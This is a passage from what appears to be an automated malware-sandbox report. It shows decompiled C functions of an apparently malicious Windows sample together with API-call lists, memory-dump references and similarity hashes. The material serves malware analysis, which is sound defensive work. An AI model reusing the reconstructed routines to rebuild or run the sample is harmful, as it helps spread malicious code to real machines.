			HeapFree( *0xa8d270, 0, _t40);
			goto L10;
		}
		_t24 = E00A8A565(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
		L5:
		_t30 = _t24;
		goto L7;
	}
	if(RtlAllocateHeap() == 0) {
		goto L6;
	}
	_t24 = E00A870F4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
	goto L5;
}












APIs
• RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 00A84653
  • Part of subcall function 00A870F4: GetTickCount.KERNEL32 ref: 00A87108
  • Part of subcall function 00A870F4: wsprintfA.USER32 ref: 00A87158
  • Part of subcall function 00A870F4: wsprintfA.USER32 ref: 00A87175
  • Part of subcall function 00A870F4: wsprintfA.USER32 ref: 00A871A1
  • Part of subcall function 00A870F4: HeapFree.KERNEL32(00000000,?), ref: 00A871B3
  • Part of subcall function 00A870F4: wsprintfA.USER32 ref: 00A871D4
  • Part of subcall function 00A870F4: HeapFree.KERNEL32(00000000,?), ref: 00A871E4
  • Part of subcall function 00A870F4: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A87212
  • Part of subcall function 00A870F4: GetTickCount.KERNEL32 ref: 00A87223
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 00A84671
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000002,00A8A0CB,?,00A8A0CB,00000002,?,?,00A858BD,?), ref: 00A846CE
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 1676223858-1536154274
                                                                                                                                                                                                                                • Opcode ID: ed54f74b2764d9ad7047de0d59724e303378e49c5ba7c3085ab13a15fae6bf84
                                                                                                                                                                                                                                • Instruction ID: deb23f0e4b87eddedab8d30e6c6af6afe6fd5d18682c632d36c47b2883d09c9b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed54f74b2764d9ad7047de0d59724e303378e49c5ba7c3085ab13a15fae6bf84
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E211A75200206EBDB01EF94DD84EDA3BBDAB49354F100026F906AB291EB70D9569BA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00A82EE1
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A82FC6
                                                                                                                                                                                                                                  • Part of subcall function 00A86533: SysAllocString.OLEAUT32(00A8C2B0), ref: 00A86583
                                                                                                                                                                                                                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 00A83019
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A83028
                                                                                                                                                                                                                                  • Part of subcall function 00A8590A: Sleep.KERNEL32(000001F4), ref: 00A85952
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3193056040-0
                                                                                                                                                                                                                                • Opcode ID: fdf7c8da785c28ad077820cef8f8495720f13f33865cf1ac832b2bdb93decb7e
                                                                                                                                                                                                                                • Instruction ID: b4a6269a518729b995fad1ae47a415e23a7b56d542a12b41828048f78ef489a0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdf7c8da785c28ad077820cef8f8495720f13f33865cf1ac832b2bdb93decb7e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95516336900609EFDB11DFA8C844ADEB7B5FF88750F148828E945DB264DB71EE06CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 46%
                                                                                                                                                                                                                                			E00A86533(intOrPtr* __eax) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				WCHAR* _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                				void* _v32;
                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                				short _v48;
                                                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                                                				short _v64;
                                                                                                                                                                                                                                				intOrPtr* _t54;
                                                                                                                                                                                                                                				intOrPtr* _t56;
                                                                                                                                                                                                                                				intOrPtr _t57;
                                                                                                                                                                                                                                				intOrPtr* _t58;
                                                                                                                                                                                                                                				intOrPtr* _t60;
                                                                                                                                                                                                                                				void* _t61;
                                                                                                                                                                                                                                				intOrPtr* _t63;
                                                                                                                                                                                                                                				intOrPtr* _t65;
                                                                                                                                                                                                                                				short _t67;
                                                                                                                                                                                                                                				intOrPtr* _t68;
                                                                                                                                                                                                                                				intOrPtr* _t70;
                                                                                                                                                                                                                                				intOrPtr* _t72;
                                                                                                                                                                                                                                				intOrPtr* _t75;
                                                                                                                                                                                                                                				intOrPtr* _t77;
                                                                                                                                                                                                                                				intOrPtr _t79;
                                                                                                                                                                                                                                				intOrPtr* _t83;
                                                                                                                                                                                                                                				intOrPtr* _t87;
                                                                                                                                                                                                                                				intOrPtr _t103;
                                                                                                                                                                                                                                				intOrPtr _t109;
                                                                                                                                                                                                                                				void* _t118;
                                                                                                                                                                                                                                				void* _t122;
                                                                                                                                                                                                                                				void* _t123;
                                                                                                                                                                                                                                				intOrPtr _t130;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t123 = _t122 - 0x3c;
                                                                                                                                                                                                                                				_push( &_v8);
                                                                                                                                                                                                                                				_push(__eax);
                                                                                                                                                                                                                                				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                                                                                                                                                				if(_t118 >= 0) {
                                                                                                                                                                                                                                					_t54 = _v8;
                                                                                                                                                                                                                                					_t103 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                					_t5 = _t103 + 0xa8e038; // 0x3050f485
                                                                                                                                                                                                                                					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                                                                                                                                                					_t56 = _v8;
                                                                                                                                                                                                                                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                                                                                                                                                					if(_t118 >= 0) {
                                                                                                                                                                                                                                						__imp__#2(0xa8c2b0);
                                                                                                                                                                                                                                						_v28 = _t57;
                                                                                                                                                                                                                                						if(_t57 == 0) {
                                                                                                                                                                                                                                							_t118 = 0x8007000e;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t60 = _v32;
                                                                                                                                                                                                                                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                                                                                                                                                							_t87 = __imp__#6;
                                                                                                                                                                                                                                							_t118 = _t61;
                                                                                                                                                                                                                                							if(_t118 >= 0) {
                                                                                                                                                                                                                                								_t63 = _v24;
                                                                                                                                                                                                                                								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                                                                                                                                                								if(_t118 >= 0) {
                                                                                                                                                                                                                                									_t130 = _v20;
                                                                                                                                                                                                                                									if(_t130 != 0) {
                                                                                                                                                                                                                                										_t67 = 3;
                                                                                                                                                                                                                                										_v64 = _t67;
                                                                                                                                                                                                                                										_v48 = _t67;
                                                                                                                                                                                                                                										_v56 = 0;
                                                                                                                                                                                                                                										_v40 = 0;
                                                                                                                                                                                                                                										if(_t130 > 0) {
                                                                                                                                                                                                                                											while(1) {
                                                                                                                                                                                                                                												_t68 = _v24;
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												_t123 = _t123;
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                                                                                                                                                                                                												if(_t118 < 0) {
                                                                                                                                                                                                                                													goto L16;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                												_t70 = _v8;
                                                                                                                                                                                                                                												_t109 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                												_t28 = _t109 + 0xa8e0bc; // 0x3050f1ff
                                                                                                                                                                                                                                												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                                                                                                                                                                                                												if(_t118 >= 0) {
                                                                                                                                                                                                                                													_t75 = _v16;
                                                                                                                                                                                                                                													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                                                                                                                                                                                                													if(_t118 >= 0 && _v12 != 0) {
                                                                                                                                                                                                                                														_t79 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                														_t33 = _t79 + 0xa8e078; // 0x76006f
                                                                                                                                                                                                                                														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                                                                                                                                                															_t83 = _v16;
                                                                                                                                                                                                                                															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                														 *_t87(_v12);
                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                													_t77 = _v16;
                                                                                                                                                                                                                                													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                												_t72 = _v8;
                                                                                                                                                                                                                                												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                                                                                                                                												_v40 = _v40 + 1;
                                                                                                                                                                                                                                												if(_v40 < _v20) {
                                                                                                                                                                                                                                													continue;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                												goto L16;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								L16:
                                                                                                                                                                                                                                								_t65 = _v24;
                                                                                                                                                                                                                                								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							 *_t87(_v28);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t58 = _v32;
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t118;
                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                0x00a866c4

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00A8C2B0), ref: 00A86583
                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00A86664
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A8667D
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00A866AC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$Free$Alloclstrcmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1885612795-0
                                                                                                                                                                                                                                • Opcode ID: 3abd944f3dd64e6e1ad960e682c255e48e34cd0c38ce3f980baeb66558b06569
                                                                                                                                                                                                                                • Instruction ID: 5efb4718ca594a190fe35ac89d73778fb6885935ebb78fd112b937677df0d59e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3abd944f3dd64e6e1ad960e682c255e48e34cd0c38ce3f980baeb66558b06569
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B514C75D00519EFDB04EFE8C9889AEB7B9FF88705B144598E915EB214E731AD02CFA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E00A84EEE(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                                				void _v156;
                                                                                                                                                                                                                                				void _v428;
                                                                                                                                                                                                                                				void* _t55;
                                                                                                                                                                                                                                				unsigned int _t56;
                                                                                                                                                                                                                                				signed int _t66;
                                                                                                                                                                                                                                				signed int _t74;
                                                                                                                                                                                                                                				void* _t76;
                                                                                                                                                                                                                                				signed int _t79;
                                                                                                                                                                                                                                				void* _t81;
                                                                                                                                                                                                                                				void* _t92;
                                                                                                                                                                                                                                				void* _t96;
                                                                                                                                                                                                                                				signed int* _t99;
                                                                                                                                                                                                                                				signed int _t101;
                                                                                                                                                                                                                                				signed int _t103;
                                                                                                                                                                                                                                				void* _t107;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t92 = _a12;
                                                                                                                                                                                                                                				_t101 = __eax;
                                                                                                                                                                                                                                				_t55 = E00A8650C(_a16, _t92);
                                                                                                                                                                                                                                				_t79 = _t55;
                                                                                                                                                                                                                                				if(_t79 == 0) {
                                                                                                                                                                                                                                					L18:
                                                                                                                                                                                                                                					return _t55;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                                                                                                                                				_t81 = 0;
                                                                                                                                                                                                                                				_t96 = 0x20;
                                                                                                                                                                                                                                				if(_t56 == 0) {
                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                					_t97 = _t96 - _t81;
                                                                                                                                                                                                                                					_v12 = _t96 - _t81;
                                                                                                                                                                                                                                					E00A85450(_t79,  &_v428);
                                                                                                                                                                                                                                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00A87436(_t101,  &_v428, _a8, _t96 - _t81);
                                                                                                                                                                                                                                					E00A87436(_t79,  &_v156, _a12, _t97);
                                                                                                                                                                                                                                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                                                                                                                                                                                                                					_t66 = E00A85450(_t101, 0xa8d168);
                                                                                                                                                                                                                                					_t103 = _t101 - _t79;
                                                                                                                                                                                                                                					_a8 = _t103;
                                                                                                                                                                                                                                					if(_t103 < 0) {
                                                                                                                                                                                                                                						L17:
                                                                                                                                                                                                                                						E00A85450(_a16, _a4);
                                                                                                                                                                                                                                						E00A81072(_t79,  &_v428, _a4, _t97);
                                                                                                                                                                                                                                						memset( &_v428, 0, 0x10c);
                                                                                                                                                                                                                                						_t55 = memset( &_v156, 0, 0x84);
                                                                                                                                                                                                                                						goto L18;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                							_push(1);
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							_push( *_t99);
                                                                                                                                                                                                                                							L00A8AEC0();
                                                                                                                                                                                                                                							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                                                                                                                                							asm("adc edx, esi");
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							_push(_v8 + 1);
                                                                                                                                                                                                                                							_push(_t92);
                                                                                                                                                                                                                                							_push(_t74);
                                                                                                                                                                                                                                							L00A8AEBA();
                                                                                                                                                                                                                                							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                                                                                                                                								_t74 = _t74 | 0xffffffff;
                                                                                                                                                                                                                                								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t74 =  *_t99;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                                                                                                                                                                                                                						_a12 = _t74;
                                                                                                                                                                                                                                						_t76 = E00A86A23(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                                							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                							if( *_t99 != 0) {
                                                                                                                                                                                                                                								goto L14;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L13:
                                                                                                                                                                                                                                							_t92 =  &_v156;
                                                                                                                                                                                                                                							if(E00A867D9(_t79, _t92, _t106) < 0) {
                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L14:
                                                                                                                                                                                                                                							_a12 = _a12 + 1;
                                                                                                                                                                                                                                							_t76 = E00A85465(_t79,  &_v156, _t106, _t106);
                                                                                                                                                                                                                                							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                							if( *_t99 != 0) {
                                                                                                                                                                                                                                								goto L14;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_a8 = _a8 - 1;
                                                                                                                                                                                                                                						_t66 = _a12;
                                                                                                                                                                                                                                						_t99 = _t99 - 4;
                                                                                                                                                                                                                                						 *(0xa8d168 + _a8 * 4) = _t66;
                                                                                                                                                                                                                                					} while (_a8 >= 0);
                                                                                                                                                                                                                                					_t97 = _v12;
                                                                                                                                                                                                                                					goto L17;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				while(_t81 < _t96) {
                                                                                                                                                                                                                                					_t81 = _t81 + 1;
                                                                                                                                                                                                                                					_t56 = _t56 >> 1;
                                                                                                                                                                                                                                					if(_t56 != 0) {
                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L4;
                                                                                                                                                                                                                                			}


                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00A84FA1
                                                                                                                                                                                                                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00A84FB7
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A85060
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A85076
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memset$_allmul_aulldiv
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3041852380-0
                                                                                                                                                                                                                                • Opcode ID: 5b2b402cf2e6c8df42164eb43cc42421fa54326024539b178f07d67a4b5ce5f1
                                                                                                                                                                                                                                • Instruction ID: 4f88da8494d227e5b95dc251e0f01ca60819ef4e31d205bc69a5aae4d86c97ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b2b402cf2e6c8df42164eb43cc42421fa54326024539b178f07d67a4b5ce5f1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B241A071A0021AAFDB20BF68DC41FEE77B9EF49710F104569B909A7281DB70AE45CB91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E00A86C82(signed int _a4, signed int* _a8) {
                                                                                                                                                                                                                                				void* __ecx;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				signed int _t6;
                                                                                                                                                                                                                                				intOrPtr _t8;
                                                                                                                                                                                                                                				intOrPtr _t12;
                                                                                                                                                                                                                                				short* _t19;
                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                				signed int* _t28;
                                                                                                                                                                                                                                				CHAR* _t30;
                                                                                                                                                                                                                                				long _t31;
                                                                                                                                                                                                                                				intOrPtr* _t32;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t6 =  *0xa8d2a8; // 0xd448b889
                                                                                                                                                                                                                                				_t32 = _a4;
                                                                                                                                                                                                                                				_a4 = _t6 ^ 0x109a6410;
                                                                                                                                                                                                                                				_t8 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                				_t3 = _t8 + 0xa8e876; // 0x61636f4c
                                                                                                                                                                                                                                				_t25 = 0;
                                                                                                                                                                                                                                				_t30 = E00A86E66(_t3, 1);
                                                                                                                                                                                                                                				if(_t30 != 0) {
                                                                                                                                                                                                                                					_t25 = CreateEventA(0xa8d2e4, 1, 0, _t30);
                                                                                                                                                                                                                                					E00A853BB(_t30);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t12 =  *0xa8d294; // 0x2000000a
                                                                                                                                                                                                                                				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00A8A1D4() != 0) {
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					_t28 = _a8;
                                                                                                                                                                                                                                					if(_t28 != 0) {
                                                                                                                                                                                                                                						 *_t28 =  *_t28 | 0x00000001;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t31 = E00A874A5(_t32, 0);
                                                                                                                                                                                                                                					if(_t31 == 0 && _t25 != 0) {
                                                                                                                                                                                                                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t28 != 0 && _t31 != 0) {
                                                                                                                                                                                                                                						 *_t28 =  *_t28 & 0xfffffffe;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t19 =  *0xa8d108( *_t32, 0x20);
                                                                                                                                                                                                                                					if(_t19 != 0) {
                                                                                                                                                                                                                                						 *_t19 = 0;
                                                                                                                                                                                                                                						_t19 = _t19 + 2;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t31 = E00A86ABB(0,  *_t32, _t19, 0);
                                                                                                                                                                                                                                					if(_t31 == 0) {
                                                                                                                                                                                                                                						if(_t25 == 0) {
                                                                                                                                                                                                                                							L22:
                                                                                                                                                                                                                                							return _t31;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                                						if(_t31 == 0) {
                                                                                                                                                                                                                                							L20:
                                                                                                                                                                                                                                							if(_t25 != 0) {
                                                                                                                                                                                                                                								CloseHandle(_t25);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L22;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A86E66: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,01AE9BB8,00000000,?,?,69B25F44,00000005,00A8D00C,?,?,00A8588F), ref: 00A86E9C
                                                                                                                                                                                                                                  • Part of subcall function 00A86E66: lstrcpy.KERNEL32(00000000,00000000), ref: 00A86EC0
                                                                                                                                                                                                                                  • Part of subcall function 00A86E66: lstrcat.KERNEL32(00000000,00000000), ref: 00A86EC8
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00A8D2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00A8521B,?,00000001,?), ref: 00A86CC3
                                                                                                                                                                                                                                  • Part of subcall function 00A853BB: RtlFreeHeap.NTDLL(00000000,00000000,00A812FA,00000000,?,?,00000000), ref: 00A853C7
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00004E20,00A8521B,00000000,00000000,?,00000000,?,00A8521B,?,00000001,?,?,?,?,00A8A0EC), ref: 00A86D23
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00A8521B,?,00000001,?), ref: 00A86D51
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00A8521B,?,00000001,?,?,?,?,00A8A0EC), ref: 00A86D69
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 73268831-0
                                                                                                                                                                                                                                • Opcode ID: c7f504e0b09411ef71788434507f98cc43be5457a39564a4e0b7d3f06eadb95c
                                                                                                                                                                                                                                • Instruction ID: 854468cf4ee266147772d7762d041da384d517d2d58a636e7582f4140b1880df
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7f504e0b09411ef71788434507f98cc43be5457a39564a4e0b7d3f06eadb95c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47212C32740B559BEB31BFA89C84A6B77A9FF44760F050615F945DB255DB30DC028790
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 40%
                                                                                                                                                                                                                                			E00A8516C(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                				signed int* _t39;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t36 = __ecx;
                                                                                                                                                                                                                                				_v32 = 0;
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				_v12 = _a4;
                                                                                                                                                                                                                                				_t38 = E00A85597(__ecx,  &_v32);
                                                                                                                                                                                                                                				if(_t38 != 0) {
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					_t39 = _a8;
                                                                                                                                                                                                                                					L13:
                                                                                                                                                                                                                                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
